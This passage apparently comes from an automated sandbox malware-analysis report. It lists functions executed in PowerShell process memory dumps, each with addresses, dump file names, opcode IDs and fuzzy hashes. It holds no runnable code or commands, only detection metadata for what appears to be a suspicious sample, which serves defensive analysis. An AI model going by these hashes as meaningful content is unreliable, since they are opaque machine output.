                    • Instruction Fuzzy Hash: EB31B63291CB894FD349DB14D4515AABBE5FF85320F0406BBE489C73A2DA38A945C7C2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFF7F011775 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.301290087.00007FFF7F010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F010000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7fff7f010000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c77019f54d51d50a7da08af708998f1d891624b57d0045a7a00b50aa4ea0557a
                    • Instruction ID: 0f90bc35966678d5dbd453914f4e5b7cf57e433eedaf292958953f1e485869b7
                    • Opcode Fuzzy Hash: c77019f54d51d50a7da08af708998f1d891624b57d0045a7a00b50aa4ea0557a
                    • Instruction Fuzzy Hash: 5C01677111CB0C4FD748EF0CE451AAAB7E0FB95364F10056EE58AC3691DA36E882CB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Function 07B08200 Relevance: .7, Instructions: 701COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a2ae1b1e5ebbca52123c28f74f510c2ab892645b5a945963cba280be920ebba
                    • Instruction ID: 1deaad611e22c5ea613b1fae43eb39ddeccb566b972d44612dbc1524179dd827
                    • Opcode Fuzzy Hash: 8a2ae1b1e5ebbca52123c28f74f510c2ab892645b5a945963cba280be920ebba
                    • Instruction Fuzzy Hash: 1E526DB0600219DFDB24DF24C850BAEB7B2EF89304F1585A9E909AB790DB35ED45CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1FA40 Relevance: .3, Instructions: 315COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5c61e827309c7cbe17ba23a1b070cb57df8ff56cf37ed4845c6438605c5d24d
                    • Instruction ID: 71426056c7e4e21b48a0ccfe824de0538c0a000fdd5bc00a1c824c145d587048
                    • Opcode Fuzzy Hash: d5c61e827309c7cbe17ba23a1b070cb57df8ff56cf37ed4845c6438605c5d24d
                    • Instruction Fuzzy Hash: 3BB1D2B0B05241DFEB28EB74981867E7BE7AFC9200B148469D51ACB395DF35DC02CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A16CF1 Relevance: .3, Instructions: 252COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 941fd63982b330b5757969b7c8fe1e218f564114df6c5eefd9f4ca480d2144db
                    • Instruction ID: d6352aa81827816329ab833b739a2da551d709d0315aef72a463d7d32dff4a35
                    • Opcode Fuzzy Hash: 941fd63982b330b5757969b7c8fe1e218f564114df6c5eefd9f4ca480d2144db
                    • Instruction Fuzzy Hash: 60A181B45147018BE720EB64D584A6A77A7EBC2324F20CB1CE17A8B7D0DF74B8468F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A16D00 Relevance: .2, Instructions: 249COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e5d80e1da23b3219faf44aa0d3e1cc46dd2d71d4d6885f6505170bfb5df8787
                    • Instruction ID: d2a491c8637dc6f4732f0582edec02d8bf372a69a3e34558c4e1a290976288b9
                    • Opcode Fuzzy Hash: 9e5d80e1da23b3219faf44aa0d3e1cc46dd2d71d4d6885f6505170bfb5df8787
                    • Instruction Fuzzy Hash: 95A18FB45147018BE720EB64D584A7A77A6EBC2324F20CB1CE17A8B7D0DF74B8468F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B06E86 Relevance: .2, Instructions: 223COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff6e9faa950d4e453c76cfe74598c1a46bd6d8091a29910beb9d313f3369f860
                    • Instruction ID: 821b8e729368b0ab5b2933d4616afda04db0e9f6ae3c46dc29c07586890c47cf
                    • Opcode Fuzzy Hash: ff6e9faa950d4e453c76cfe74598c1a46bd6d8091a29910beb9d313f3369f860
                    • Instruction Fuzzy Hash: 69913CB1A01215CFEB24DF65D844BAEBBB2FF88314F1581A9D509A7290DF34AD45CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1D120 Relevance: .2, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4eed10eda3cb29793f2d0a12fe2a9a88ae01533e6e67f217ea8e531597322cc
                    • Instruction ID: 545d3ead3d2eb9ea6111a4fe1b6af22058d2248cdb6842f62a15a09129313729
                    • Opcode Fuzzy Hash: e4eed10eda3cb29793f2d0a12fe2a9a88ae01533e6e67f217ea8e531597322cc
                    • Instruction Fuzzy Hash: 96818E74B042148FEB18DFB8D854AAEBBF2EFC9211F158569D812A7390DB34DC45CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1C470 Relevance: .2, Instructions: 190COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04918b58eefa9aaba0cfa9b102b84011527a23da6d2a0fd4d640fd9a7ead1188
                    • Instruction ID: 104c791539b959f9d8a5c35af0db614ea97946f77997305fd82054f9d8675ac9
                    • Opcode Fuzzy Hash: 04918b58eefa9aaba0cfa9b102b84011527a23da6d2a0fd4d640fd9a7ead1188
                    • Instruction Fuzzy Hash: 2F7179B4A00209CFDB14DF59C484AAEBBF2EF88324F55D469D819AB351DB30AC45CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A19580 Relevance: .2, Instructions: 164COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad0d197b42c71bbdc00d876f33468ce09e82d7773f6630b7c69a92766063514f
                    • Instruction ID: bc6292ee0a9d419c45f4151519ec3caaa58163dba8b531104226cae0492ead47
                    • Opcode Fuzzy Hash: ad0d197b42c71bbdc00d876f33468ce09e82d7773f6630b7c69a92766063514f
                    • Instruction Fuzzy Hash: CA616874A042589FDB14DFA8D89099DBBF2BF89304F1581A9E405AB761DB31EC01CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1E658 Relevance: .1, Instructions: 133COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c75775af40cd842436be1406269268c093d5b6a6c5e59237449c17c4616abf81
                    • Instruction ID: 87343dba564fc08e6f7e98a654619a3a6efbd9fd721c36e99ef61cc671ef5c97
                    • Opcode Fuzzy Hash: c75775af40cd842436be1406269268c093d5b6a6c5e59237449c17c4616abf81
                    • Instruction Fuzzy Hash: 1A41C37070C246CFEB249B34D99863A7BEABFC4216B54047ED427C7691DB78D845CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1D11D Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d4162292e59a86d6358a0c8f99cfe7475b2a24d22a32902cf31801bfd9289bbb
                    • Instruction ID: 1f34f476cf2cc0dd593cda2a1fd1cb38e5b2a7b86cbe88b96b31b1ee2223c712
                    • Opcode Fuzzy Hash: d4162292e59a86d6358a0c8f99cfe7475b2a24d22a32902cf31801bfd9289bbb
                    • Instruction Fuzzy Hash: DD416AB4E002158FEB14DFB9D844AEDBBF2AF89304F158569D821A7390DB34E844CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A19668 Relevance: .1, Instructions: 84COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2fa857993f661e2105ba1500c9ddf091576be0176a340191ef9eb315a3ec3e6
                    • Instruction ID: c7468665fff6c465f57799c0b975667604b4808134f61947365a6ba87ac46b98
                    • Opcode Fuzzy Hash: b2fa857993f661e2105ba1500c9ddf091576be0176a340191ef9eb315a3ec3e6
                    • Instruction Fuzzy Hash: D4316874A00264DFDB14DFA8D8A4D9DB7F2EF88204B158258E406AB761CB31EC01CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1966F Relevance: .1, Instructions: 84COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca0bd1c2febe989855c99bbd4b3709b6c7a15e562a6c75c216398f6499225f27
                    • Instruction ID: c7468665fff6c465f57799c0b975667604b4808134f61947365a6ba87ac46b98
                    • Opcode Fuzzy Hash: ca0bd1c2febe989855c99bbd4b3709b6c7a15e562a6c75c216398f6499225f27
                    • Instruction Fuzzy Hash: D4316874A00264DFDB14DFA8D8A4D9DB7F2EF88204B158258E406AB761CB31EC01CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A19676 Relevance: .1, Instructions: 83COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 52bb3b6998247ff8f62145f24dca9339eb3f2296769ef2ff71a5c866459c563d
                    • Instruction ID: 8dcb7aa6b7d3709129e954bb7364292424a5b012504e3281d7b22a7f29be547b
                    • Opcode Fuzzy Hash: 52bb3b6998247ff8f62145f24dca9339eb3f2296769ef2ff71a5c866459c563d
                    • Instruction Fuzzy Hash: 21314674A00264DFDB14DFA8D8A4D9DB7F2EF88314B158268E406AB761CB31EC05CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1EA00 Relevance: .1, Instructions: 80COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ebde8bbe8e7d4a79b40866eba6c31501d99431b8747bffd6739435a026d2da6
                    • Instruction ID: c9a59d8218df2d667362d9c0bfd260681821303c683034ab8436e236b92de532
                    • Opcode Fuzzy Hash: 6ebde8bbe8e7d4a79b40866eba6c31501d99431b8747bffd6739435a026d2da6
                    • Instruction Fuzzy Hash: 9A214F767081914FE714972CD440AA9FBE2BFC6327B0D40B6E869CB752C624DC41C791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1C3C0 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d64ee566946ca3eadc45899698fad346302e4ccd03959e2c8d64d3d6ca626164
                    • Instruction ID: 56f8b1d294112c657fc22a1125a6a30946bd36284faa6412001fe17306171067
                    • Opcode Fuzzy Hash: d64ee566946ca3eadc45899698fad346302e4ccd03959e2c8d64d3d6ca626164
                    • Instruction Fuzzy Hash: 9E11A1327041259FE7149BA9E808BBBB7DBEBC9365F14857AD209C7780CA759C0187E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1E520 Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25ea35de006deffc048ced025a244515952f44d49b5573a35bcc756171de6224
                    • Instruction ID: a58501193be8493c35e01ee562843d325cf44bd07b52b0d5e3fe7be68f2a566f
                    • Opcode Fuzzy Hash: 25ea35de006deffc048ced025a244515952f44d49b5573a35bcc756171de6224
                    • Instruction Fuzzy Hash: 3B214FB1D046199FDB00CF9AD544BDEFBF5FB48324F148519D414A3640D734A555CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A19570 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad1dc49b2209aedb33162b1488231d5455c42580e70f951ca961fbf40f85121d
                    • Instruction ID: d9ee23aba4a4248d235eca3e190125b262fbf4e532c8c8b3243c575849d1e861
                    • Opcode Fuzzy Hash: ad1dc49b2209aedb33162b1488231d5455c42580e70f951ca961fbf40f85121d
                    • Instruction Fuzzy Hash: F31167B0D042599FDB44DFA8D8409EEBBF2AF88314F15856DC519EB610EB30A840CFE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1EA10 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e0b69fc95f0439b81dcbd0ad9bfd372f4c4348adfc0da59466ec40bc9bc8840
                    • Instruction ID: f09f054cb35b1dc9ac19db7aad5d3174b5eb5ce7a874ff836bd6b95ac881ad09
                    • Opcode Fuzzy Hash: 2e0b69fc95f0439b81dcbd0ad9bfd372f4c4348adfc0da59466ec40bc9bc8840
                    • Instruction Fuzzy Hash: A81106B16081514FF714A72984907BDBBA6BBC7313F4D44B6DC75D7642CA24CC448392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1CDCC Relevance: .1, Instructions: 57COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b6d9cf1c9232cc4ead190e87a6a581616548ab4fe320842fa161b6781bf02a9
                    • Instruction ID: 73f277ecbf18ee4f5e22a98d0f0cbc0694e34dcad98b5c0e4e42d6d6a8ae6962
                    • Opcode Fuzzy Hash: 8b6d9cf1c9232cc4ead190e87a6a581616548ab4fe320842fa161b6781bf02a9
                    • Instruction Fuzzy Hash: 67214AB1D0461A9FDB10CF9AD5447EEFBF4FB48320F04852AE818A3640D774AA55CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1E358 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f744a73ddfba902b824e624e3bfeecd25eaa8b05a4e7cf84545a8ac812fd233
                    • Instruction ID: 414be000adb72f40a08c8d0f334c685588d3fea55f823452465d22bbccdc2b54
                    • Opcode Fuzzy Hash: 1f744a73ddfba902b824e624e3bfeecd25eaa8b05a4e7cf84545a8ac812fd233
                    • Instruction Fuzzy Hash: 6701FCB271C6218BFB388B79D4007B773D8EB80BA6F084576EC1EC7690D665DC408790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B0F690 Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b058429b4f91930111bdae95f90e48d801b6a522e15ecb45c28922a838cf12fd
                    • Instruction ID: 27ea103802d9fd732207d876fcc5eea7880dd17ea50998fb9ecf640ae8f7ec96
                    • Opcode Fuzzy Hash: b058429b4f91930111bdae95f90e48d801b6a522e15ecb45c28922a838cf12fd
                    • Instruction Fuzzy Hash: 3D0125743047108BD320DB64D84492A7BA2EFC1218B49497DD6468B750EF75AD058BD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B06768 Relevance: .1, Instructions: 52COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 790b53fb4995c012a57eb3952fc38b54c1101d318cf7bd7a5fa197e98fb2680e
                    • Instruction ID: cdefc8e8ed3d20bc1e9e754c71b0602ae180833d75423eb4de22e6a0005b187e
                    • Opcode Fuzzy Hash: 790b53fb4995c012a57eb3952fc38b54c1101d318cf7bd7a5fa197e98fb2680e
                    • Instruction Fuzzy Hash: 2F01D8F5B093414FDB598668D41842A7BB9EFDA25871980AEDC04CB382EF21DC17C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1E349 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8fb3f54e6cfeda4ad5341ff0203b937c0cdb930751e760ee45970d728c449ea
                    • Instruction ID: c310b753fe17065d3f169857f996d2d8ee9df5aa6fab13f635397846d0028391
                    • Opcode Fuzzy Hash: d8fb3f54e6cfeda4ad5341ff0203b937c0cdb930751e760ee45970d728c449ea
                    • Instruction Fuzzy Hash: A9014CB130D7618FE7398B35C400BBA7BE4AF82B61F0945EADC61CB292D764DC848791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B0F6A0 Relevance: .0, Instructions: 48COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de3b83673847b1bd9c0c408ecad6f9ff76abb3a5a3dd05209e9f025842677b23
                    • Instruction ID: bf8a034e25b98b8cd3b575e748e7092d0db1389d512453465b7dcef452b0f468
                    • Opcode Fuzzy Hash: de3b83673847b1bd9c0c408ecad6f9ff76abb3a5a3dd05209e9f025842677b23
                    • Instruction Fuzzy Hash: DE01F5743047118BD324DB68D884D2A77A6EFC0228B454A3CD6068BB44DF71EC058BD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B04C98 Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75e4059ceecd5e68060063cf0da362cf8a27ae801b04b1c47b38b712fa9a6ff9
                    • Instruction ID: 9198c9d34d522153f41f49d006db18e02f2c5e7826c26233a1157e855d011fd9
                    • Opcode Fuzzy Hash: 75e4059ceecd5e68060063cf0da362cf8a27ae801b04b1c47b38b712fa9a6ff9
                    • Instruction Fuzzy Hash: C6F052B2B00104A7CB1496A8D8048DA77AAEFCA211F0000B9D906E3780EFB59D0BC7C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1BF68 Relevance: .0, Instructions: 34COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d9565721ea6e883ed0a99e2f1a127879a8a6271da15e2c5a5f7f9be06fe421f6
                    • Instruction ID: 12b59d3df30b0cc9f7a779354511d14254d1f6b50e7a440f4faa2b488bc1e132
                    • Opcode Fuzzy Hash: d9565721ea6e883ed0a99e2f1a127879a8a6271da15e2c5a5f7f9be06fe421f6
                    • Instruction Fuzzy Hash: E9E01A737141265B6B48D6BB78045AFB7CBDBC4566308803AE60DC2644EE25C80656A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B0E4E0 Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebbb0eb3e4b8912a0af1ed9802be143a6a5450fb4e158fdf315f825dd3712b3d
                    • Instruction ID: 6197ce4c54966493d034e7cbc245164985d2567107a415c67ecd2764a51c1e08
                    • Opcode Fuzzy Hash: ebbb0eb3e4b8912a0af1ed9802be143a6a5450fb4e158fdf315f825dd3712b3d
                    • Instruction Fuzzy Hash: 97F08C613095104BE244E6B8F520A9A6B929BC6310F1A81EAD5088B38ADE78CC0387D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B04CA8 Relevance: .0, Instructions: 30COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 772007709c08467cb6c2f72b99bf4ba6d18c0416f78b6dbd8a5bbff3fccaa2cd
                    • Instruction ID: 4082436fa171a4df3c1c3ed36488860fa83975288bc4ed8daf2f1a3528930ba4
                    • Opcode Fuzzy Hash: 772007709c08467cb6c2f72b99bf4ba6d18c0416f78b6dbd8a5bbff3fccaa2cd
                    • Instruction Fuzzy Hash: F4E06536B1021497CB149669D8148EE77EAEBC9212F4400BDD906E7740DF759C15CBD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07B067C0 Relevance: .0, Instructions: 24COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8f65ea284e13277991a5cecdadcdf759ce008c3c3e3c0d61cc6b59686eb43c2
                    • Instruction ID: 46e144d490aa15f451149fee414521e050b7e06c876324ef45f0e2fd242ef286
                    • Opcode Fuzzy Hash: c8f65ea284e13277991a5cecdadcdf759ce008c3c3e3c0d61cc6b59686eb43c2
                    • Instruction Fuzzy Hash: C0D0177B7194245B82149A9EFA4486AF79EDBC9A3531880BBE90DC7340DA62EC13C6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A17644 Relevance: .0, Instructions: 20COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0fc440e6dc4ea68af5da1c331651d43fb856d9e94986db2f692b05b856b57fa9
                    • Instruction ID: f2ea5788597c2c124081a12a1239e7dbeb67a4a610b4d8d749a7ac20841450ff
                    • Opcode Fuzzy Hash: 0fc440e6dc4ea68af5da1c331651d43fb856d9e94986db2f692b05b856b57fa9
                    • Instruction Fuzzy Hash: 2CE0DFB5A0020ACBCB10DF94F9416EE73B1EBC1305F104429D109A3640DB34BE018F92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1DBAF Relevance: .0, Instructions: 20COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2319bda78adcb53fe3a65834c0efdd37bd20136876f79781039a36f92270fba
                    • Instruction ID: 1e027ee4b30158881ba3c12fd4bb194d28cdff87a9dc3c6e456a1dd6776b7111
                    • Opcode Fuzzy Hash: b2319bda78adcb53fe3a65834c0efdd37bd20136876f79781039a36f92270fba
                    • Instruction Fuzzy Hash: D2E02E3270C008CBEB085B2CB89A2BEB33AF7C5716F004026E027C1482CB388A028B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07A1778E Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
